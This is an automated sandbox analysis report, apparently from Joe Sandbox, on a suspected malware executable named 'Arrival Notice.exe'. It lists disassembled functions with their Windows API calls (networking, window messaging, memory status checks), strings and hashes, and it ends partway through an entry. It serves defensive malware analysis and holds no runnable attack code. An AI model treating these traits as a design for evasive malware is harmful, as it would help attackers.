Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: _memmove_strncmp
String ID: U$\
API String ID: 2666721431-100911408
Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15

Function 00467215 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182

__wcsnicmp.LIBCMT ref: 00467288
WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E

Strings

LPT, xrefs: 00467282

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Connection__wcsnicmp_wcscpy_wcslen
String ID: LPT
API String ID: 3035604524-1350329615
Opcode ID: c89a6902ae3c489812dfd4cd3013f30facd726ae010de6d7796aa9639e79a976
Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
Opcode Fuzzy Hash: c89a6902ae3c489812dfd4cd3013f30facd726ae010de6d7796aa9639e79a976
Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99

Function 0044F082 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 161COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0044D011

Strings

\, xrefs: 0044D061
h, xrefs: 0044F78E

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: _memmove
String ID: \$h
API String ID: 4104443479-677774858
Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55

Function 0043999F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00439B66
_memcmp.LIBCMT ref: 00439BBA

Strings

&, xrefs: 004399B8

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: _memcmp
String ID: &
API String ID: 2931989736-1010288
Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4

Function 0044D3D5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0044D144

Strings

\, xrefs: 0044D061

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: _memmove
String ID: \
API String ID: 4104443479-2967466578
Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45

Function 004667E1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00466825
InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F

Strings

|, xrefs: 0046680C

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5

Function 0044835A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F

Strings

', xrefs: 004483B9

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5

Function 0040F850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0040F858

Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9

Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3

_sprintf.LIBCMT ref: 0040F9AE

Strings

%02X, xrefs: 0040F9A8

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: _memmove$_sprintf_strlen
String ID: %02X
API String ID: 1921645428-436463671
Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD

Function 00451006 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8

Strings

Combobox, xrefs: 00451067

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768

Function 00451321 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 0045134A
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A

Strings

edit, xrefs: 004513C2

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68

Function 00476CA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00476CB0
GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3

Strings

@, xrefs: 00476CBB

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F

Function 00465225 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON

Download Yara Rule

APIs

inet_addr.WSOCK32(?), ref: 00465249
htons.WSOCK32(?), ref: 004652A9

Strings

255.255.255.255, xrefs: 00465261

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: htonsinet_addr
String ID: 255.255.255.255
API String ID: 3832099526-2422070025
Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59

Function 0044256C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8

Strings

<local>, xrefs: 004425B7

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: InternetOpen
String ID: <local>
API String ID: 2038078732-4266983199
Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9

Function 00442BB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00442BFB
_memmove.LIBCMT ref: 00442C0A

Strings

u,D, xrefs: 00442BB7

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: _memmove
String ID: u,D
API String ID: 4104443479-3858472334
Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764

Function 00401B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00401B11

Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1

_memmove.LIBCMT ref: 00401B57

Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651

Strings

@EXITCODE, xrefs: 00401B10, 00401B53

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
String ID: @EXITCODE
API String ID: 2734553683-3436989551
Opcode ID: 6671e83096f05fbf7ed832023dfd6df0aed7d84870a55488e32c5eab381b68c1
Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
Opcode Fuzzy Hash: 6671e83096f05fbf7ed832023dfd6df0aed7d84870a55488e32c5eab381b68c1
Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14

Function 004560F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE

Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1

wsprintfW.USER32 ref: 0045612A

Strings

%d/%02d/%02d, xrefs: 00456124

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: MessageSend_mallocwsprintf
String ID: %d/%02d/%02d
API String ID: 1262938277-328681919
Opcode ID: 2f94ef12d061241edb9979ef4b8dfec1a2b2b476f2643c079f431c0c1a0d2850
Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
Opcode Fuzzy Hash: 2f94ef12d061241edb9979ef4b8dfec1a2b2b476f2643c079f431c0c1a0d2850
Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9

Function 00442651 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22networkCOMMON

Download Yara Rule

APIs

InternetCloseHandle.WININET(?), ref: 00442663
InternetCloseHandle.WININET ref: 00442668

Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD

Strings

aeB, xrefs: 00442655, 00442682

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: CloseHandleInternet$ObjectSingleWait
String ID: aeB
API String ID: 857135153-906807131
Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4

Function 00433244 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

_wcsncpy.LIBCMT ref: 0043325C

Strings

^B, xrefs: 00433248
C:\Users\user\Desktop\Arrival Notice.exe, xrefs: 0043324B

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
